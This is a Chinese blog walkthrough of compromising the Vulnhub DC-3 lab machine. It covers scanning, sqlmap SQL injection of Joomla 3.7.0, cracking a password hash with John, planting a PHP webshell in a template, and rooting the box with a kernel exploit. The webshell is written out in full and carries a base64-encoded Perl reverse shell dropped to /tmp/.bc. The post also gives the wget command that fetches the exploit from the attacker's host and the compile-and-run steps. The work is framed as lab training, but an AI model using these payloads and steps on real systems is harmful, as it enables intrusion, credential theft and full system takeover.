【Vulnhub靶机】DC-3 (内核exp提权)

已于 2023-11-25 12:56:43 修改
阅读量393 收藏 1
点赞数 2
分类专栏: # 靶机系列 文章标签: 靶机 网络安全 安全
于 2023-08-06 16:26:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZhaoSong_/article/details/132132184
版权

文章目录

DC-3靶场下载

DC-3MAC地址:00:0C:29:6B:E5:16

将kali跟DC-3放同一网段

信息收集

主机扫描

arp-scan命令教程

arp-scan -l

image-20230806104240671

可以用netdiscover 它是一个主动/被动的ARP 侦查工具。使用Netdiscover工具可以在网络上扫描IP地址,检查在线主机或搜索为它们发送的ARP请求。

netdiscover -r 192.168.80.0/24

image-20230806151734124

端口扫描

nmap -A -T4 -p-  192.168.80.134

-A #全面扫描
-T #扫描速度
-p- #全端口扫描

image-20230806105055273

发现80端口可用,用的是Joomlacms

浏览器访问DC-3的 80端口,用Wappalyzer插件,也可以看出是Joomla

image-20230806105225785

目录爆破

dirsearch -u 192.168.80.134 -i 200

 -u URL                      #  URL目标
 -i                          #状态码

image-20230806105738325

也可以用御剑后台扫描工具

image-20230806150217952

也可以用nikto扫描 Nikto

nikto -h 192.168.80.134

在这里插入图片描述在这里插入图片描述

进入后台管理页面

image-20230806105858097

image-20230806110107850

漏洞查找

joomscan

joomscan是一款开源的且针对joomla的扫描器,kali可以用命令apt install joomscan安装该工具。

joomscan -u 192.168.80.134

image-20230806110340748

扫描出了cms的版本,还有一些目录跟后台登入界面,这在信息收集部分已经发现

searchsploit

searchsploit是一款kali自带的搜索漏洞信息的模块,可参考searchsploit漏洞查找工具使用指南

searchsploit是一个基于Exploit-DB的命令行搜索工具,可以帮助我们查找渗透模块。
Exploit-DB是一个漏洞库,Kali Linux中保存了一个该漏洞库的拷贝,可以查找需要的渗透模块,它将搜索所有的漏洞和shellcode而且该漏洞库是保存在本地的,在没有网络的情况下也可以使用。

# 搜索 joomla 3.7.0版本的漏洞
searchsploit joomla 3.7.0

image-20230806110707060

发现有SQL注入漏洞和跨站脚本漏洞

使用find命令找出42033.txt的位置

find / -name '42033.txt'

image-20230806120618969

查看文件内容

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

image-20230806120719667

给出了注入方法

漏洞利用
SQL注入
  • 列出所有数据库

过程有点久,耐心等待。。。

sqlmap -u "http://192.168.80.134/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]  


-dbs #检测站点有哪些数据库

--level    #sqlmap默认测试所有的GET和POST参数,当--level的值大于等于2的时候也会测试HTTP Cookie头的值,当大于等于3的时候也会测试User-Agent和HTTP Referer头的值。最高为5

--risk   #执行测试的风险(0-3,默认为1)risk越高,越慢但是越安全

image-20230806113607199

  • 列出指定数据库的所有表
sqlmap -u "http://192.168.80.134/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent  -p list[fullordering] -D joomladb --tables 


-D  #指定数据库,当数据库名含有特殊符号的时候,需要用引号包括起来

--tables #列出表

image-20230806113827830

  • 列出指定库指定表的字段名
sqlmap -u "http://192.168.80.134/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent  -p list[fullordering] -D joomladb -T "#__users" --columns

image-20230806115957141

  • 获取用户名和密码
sqlmap -u "http://192.168.80.134/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent  -p list[fullordering] -D joomladb -T "#__users" -C username,password --dump

image-20230806121051296

发现用户的密码做了加密

John工具密码爆破

john 是一款大受欢迎的、免费的开源软件、基于字典的密码破解工具。

利用John工具,对该密码进行爆破拆解,工具详细信息参考John介绍及常用命令使用说明

先在桌面创建一个文件,将得到的用户密码的hash值复制进去并保存,使用john破解。

image-20230806121152271

image-20230806121221027

image-20230806121336721

得到密码后,登录后台界面

反弹shell

登陆后,就要开始寻找有没有可以getshell的地方,这类的cms肯定是有上传文件的地方,这里可以上传一个一句话木马,用蚁剑进行连接,也可以写一个php,反弹shell到我们的攻击机上,这边,经过寻找发现了有个templates的beez3的目录

image-20230806122605242

image-20230806122701155

image-20230806122804702

创建一个文件

image-20230806130117210

写入php反弹shell

image-20230806125722663
反弹 代码:

<?php
function which($pr) {
	$path = execute("which $pr");
	return ($path ? $path : $pr);
	}
function execute($cfe) {
	$res = '';
	if ($cfe) {
		if(function_exists('exec')) {
			@exec($cfe,$res);
			$res = join("\n",$res);
			} 
			elseif(function_exists('shell_exec')) {
			$res = @shell_exec($cfe);
			} elseif(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {
$res = '';
while(!@feof($f)) {
$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
function cf($fname,$text){
if($fp=@fopen($fname,'w')) {
@fputs($fp,@base64_decode($text));
@fclose($fp);
}
}
$yourip = "your IP";
$yourport = 'your port';
$usedb = array('perl'=>'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
?>

保存就上传好啦,再根据joomla的特性,模块会单独放在一个文件夹里/templates/,而beez3模块就在/templates/beez3/里面,刚才创建的shell路径为

http://192.168.80.134/templates/beez3/shell.php

用kali来监听

nc -lvvp 4444

image-20230806124347455

浏览器访问shell.php的地址http://192.168.80.134/templates/beez3/shell.php

image-20230806125907044反弹成功!!!
image-20230806125929331

Get交互shell
python3 -c 'import pty; pty.spawn("/bin/bash")'

image-20230806130710303

交互shell获取成功,但是还不是root权限

提权

查看操作系统版本信息

tac /etc/issue

image-20230806131201874

cat /proc/version

image-20230806131314137

再次使用searchsploit工具搜索漏洞 ,打开另一个终端

searchsploit Ubuntu 16.04

image-20230806131640058

Privilege Escalation(提权),这里我们使用通用4.4.x版本的提权方式

使用find命令查找路径

find / -name '39772.txt'

# 全部路径
/usr/share/exploitdb/exploits/linux/local/39772.txt

image-20230806131740267

可以直接用searchsploit -p linux/local/39772.txt会直接显示出绝对路径

image-20230806160302414

cat /usr/share/exploitdb/exploits/linux/local/39772.txt

image-20230806161041304

溢出提权(exp提权)

利用exp提权

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

下载39772.zip,粘贴复制到kali里(不能拖到kali里面,否则会出现丢包的现象)

在这里插入图片描述

image-20230806132648779

在桌面开启http服务,将下载好的文件导入到DC-3靶机里

python3 -m http.server 8888

image-20230806132745825

浏览器进行访问http://192.168.80.141:8888/

image-20230806133026241

出现这个说明服务开启成功,exp地址是

http://192.168.80.141:8888/39772/exploit.tar

回到刚才的``python交互shell`

wget http://192.168.80.141:8888/39772/exploit.tar

在这里插入图片描述

下载完后用tar命令解压该压缩包

tar -xvf exploit.tar

image-20230806133712617

cd ebpf_mapfd_doubleput_exploit

image-20230806160847229

执行

./compile.sh
./doubleput

image-20230806135029094

使用whoami查看当前用户

image-20230806135110514
切换到root的家目录

image-20230806135159050

查看the-flag.txt

image-20230806135244319

过期的秋刀鱼-
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
Vulnhub-DC-3靶场渗透练习
weixin_52451257的博客
11-17 2889
Vulnhub-DC-3 1105 DC-3 靶场地址: https://www.vulnhub.com/entry/dc-32,312/ 第一步:信息收集 nmap -sn 192.168.231.0/24 nmap -A -p- 192.168.231.141 dirb http://192.168.231.141 nikto -h http://192.168.231.141 去了日常四件套进行信息收集还可以通过joomscan工具对网站进行扫描 joomsc...
Vulnhub靶机DC系列-DC-3.2
m0_54525483的博客
12-31 1105
Vulnhub靶机DC系列-DC-3.2 靶场名称:DC-2 下载地址: DC-3-2.zip (Size: 1005 MB) Download: http://www.five86.com/downloads/DC-3-2.zip Download (Mirror): https://download.vulnhub.com/dc/DC-3-2.zip Download (Torrent): https://download.vulnhub.com/dc/DC-3-2.zip.torrent ( Ma
vulnhub靶场】Kioptrix : Level 1.2靶机提权
qq_46421742的博客
07-26 170
免责声明:本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
渗透DC-3-内核提权-文件共享
告白的博客
08-11 430
0x00 环境介绍 DC-3环境需要修改一下变量,不然无法进入,如下即可 0x01 信息搜集 老规矩了 IP 端口 web… 1)IP收集 asp-scan -l 2)端口收集 nmap -A -p- 192.168.213.151 3)子域名目录爆破 dirb http://192.168.213.151 访问web页面开始渗透 4)指纹收集 whatweb http://192.168.213.151 0x00 渗透测试 登录web页面,熟悉的一眼看到框架—Joomla 继续使用框架扫描 j
VulnhubDC-3 joomla注入和ubuntu16.04提权
ST0new的博客
07-21 1327
Vulnhub靶机DC-3 前言 刚考完试,然而不能放弃对技术的热爱,又重新拾起了dc准备把他们6个做完 今天介绍的是dc-3 ,来看看作者对他的评价 描述: DC-3是另一个专门建造的脆弱实验室,旨在获得渗透测试领域的经验。 与之前的DC版本一样,这个版本在设计时考虑了初学者,虽然这一次,只有一个标志,一个入口点,根本没有线索。 Linux技能和熟悉Linux命令行是必须的,基本渗透测...
Vulnhub-DC-3靶机实战
御七彩虹猫
03-31 976
Vulnhub-DC-3靶机实战
Vulnhub靶机渗透测试——DC-3
Cobra的博客
04-26 3347
一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu16.04): 192.168.189.182 靶机下载地址:DC: 3.2 ~ VulnHub 二、信息收集 1、使用nmap扫描存活主机 2、发现IP192.168.189.182开放80端口,再对其进行nmap扫描 nmap -sV -A -T4 192.168.189.182 3、通过扫描结果我们发现其指纹信息为joomla,访问其80端口 4、使用dirsearch对其进行目.
vulnhub靶机-DC系列-DC-3
qq_45953122的博客
09-28 254
DC-3 详细讲解,不会让你后悔的哦。 ^_^
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机
exploit.tar(DC3靶机所需提权exp-1)
02-20
39772.zip
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8275
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
登录安全分析报告:小米官网注册
Explinks的博客
05-29 1380
图形验证及交互验证方式的安全性到底如何?请看具体分析。
nginx 安全配置
fangxiang2008的博客
05-28 1130
nginx 安全配置
Dynamics 365:安全的客户参与应用程序
全网:架构师研究会
05-29 910
客户参与应用程序使用Microsoft Dataverse提供了一个丰富的安全模型,可以适应许多业务场景。本节为您提供了应考虑的安全措施的特定于产品的指导。Dataverse安全模型有以下目标:只允许用户访问他们工作所需的信息。按角色对用户进行分组,并根据这些角色限制访问权限。支持数据共享,以便用户和团队可以访问他们不拥有的记录以进行特定的协作。阻止用户访问他们不拥有或共享的记录。了解有关Mic...
车联网安全入门——CAN总线逆向(ICSim)
最新发布
weixin_66578482的博客
06-04 701
🚀🚀ICSim是一个用于模拟车辆仪表集群的工具,专门为 SocketCAN 设计。SocketCAN 是 Linux 内核中的一个模块,用于支持控制器局域网(CAN)接口。!!cansniffer,SavvyCAN
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

过期的秋刀鱼-

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值